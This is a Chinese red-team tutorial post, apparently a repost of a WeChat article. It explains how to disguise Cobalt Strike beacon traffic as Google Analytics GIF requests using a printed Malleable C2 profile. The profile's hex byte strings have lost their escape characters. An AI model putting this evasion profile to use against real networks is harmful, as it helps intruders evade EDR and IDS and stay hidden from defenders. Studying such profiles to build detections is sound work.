免杀对抗从0开始(十)

admin
admin
admin
145335
文章
119
评论
2025年5月15日18:12:53评论19 views字数 2044阅读6分48秒阅读模式

🔥师傅您好:为了确保您不错过我们的最新网络安全资讯、技术分享和前沿动态,请将我们设为星标🌟!这样,您就能轻松追踪我们的每一篇精彩内容,与我们一起共筑网络安全防线!感谢您的支持与关注!💪

免责声明:文章所涉及内容,仅供安全研究教学使用,由于传播、利用本文所提供的信息而造成的任何直接或间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。

一线红队带你从O到无限进步

本文章所涉及所有内容均是大佬上课说讲的内容,其中做了一下基础的补充,高深的技术后面会慢慢在文章中出现利用

profile文件修改

引言:

免杀木马在攻防演练中的应用越来越普遍,但即使做到了免杀效果还是很容易会被edr识别出来,因为流量在"裸奔"。而流量混淆作为一种有效的隐蔽手段,显得尤为重要。通过流量混淆,攻击者能够隐藏其恶意活动的真实身份,避免被传统的防火墙、入侵检测系统(IDS)或其他安全监控工具识别和拦截。流量混淆不仅能伪装木马与正常网络流量难以区分,还能通过不断变化的数据模式、加密通信或使用不同的协议端口,增加分析人员识别和追踪的难度。这种策略使得木马能够长期潜伏在受害者网络中,最大限度地延迟被发现的时间,从而提高攻击成功的概率。因此,流量混淆不仅是免杀木马成功实现其功能的关键,也是攻击者规避安全防护的一项重要手段。

http-get {

set uri "/__utm.gif"; # 指定url中的请求

client {

parameter "utmac" "UA-2312789-3"; # 添加在url后的参数

parameter "utmcn" "2";

parameter "utmcs" "ISO-8859-1";

parameter "utmsr" "1980x1024";

parameter "utmsc" "16-bit";

parameter "utmul" "en-US";

metadata {

netbios; # 定义编码模式

prepend "__acut"; # 字符串最前端值

parameter "acuo";

}

}

server {

header "Content-Type" "image/gif";

output {

prepend "x02x87x01x01x00x02x01x44x00x3b";

prepend "xffxffxffx21xf9x04x01x00x00x00x2cx00x00x00x00";

prepend "x45x49x90x45x39x61x08x00x01x00x70x00x00x00x00";

print; # 

}

}

}

http-post {

set uri "/___utm.gif";

client {

header "Content-Type" "application/octet-stream";

id {

prepend "UA-220";

append "-2";

parameter "utmac";

}

parameter "utmcn" "1";

parameter "utmcs" "ISO-8859-1";

parameter "utmsr" "1980x1024";

parameter "utmsc" "16-bit";

parameter "utmul" "en-US";

output {

print;

}

}

server {

header "Content-Type" "image/gif";

output {

prepend "x01x00x01x00x00x02x01x44x00x3b";

prepend "xffxffxffx21xf9x04x01x00x00x00x2cx00x00x00x00";

prepend "x47x49x46x38x39x61x01x00x01x00x80x00x00x00x00";

print;

}

}

}

http-stager {

server {

header "Content-Type" "image/gif";

}

}

CS的连接过程中会有心跳包,心跳包就是为了确认连接,会使用Get方式

免杀对抗从0开始(十)

下面我们来分析数据包

免杀对抗从0开始(十)

可以看到在请求头中混淆了大量数据就是我们刚刚在profile中定义的部分参数client定义了url后面的数据,metadata定义了靶机消息用什么形式传递,这里用的是netbios编码。

当服务端下发命令后会在Get请求中体现,可以对比上一张图片,这里数据比较多是因为使用了BOF,如果使用shell命令不会这么多。

免杀对抗从0开始(十)

 server 定义了来自服务端的响应,这里指定了类型为 image/gif 的 Content-type 响应头。output 块定义了返回的数据是怎么被转换的

下发命令返回的数据会在POST包中体现

免杀对抗从0开始(十)

这些是基础的一些参数,如果想了解详细参数到https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/malleable-c2_profile-language.htm了解·

原文始发于微信公众号(泾弦安全):免杀对抗从0开始(十)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月15日18:12:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   免杀对抗从0开始(十)https://cn-sec.com/archives/4068707.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息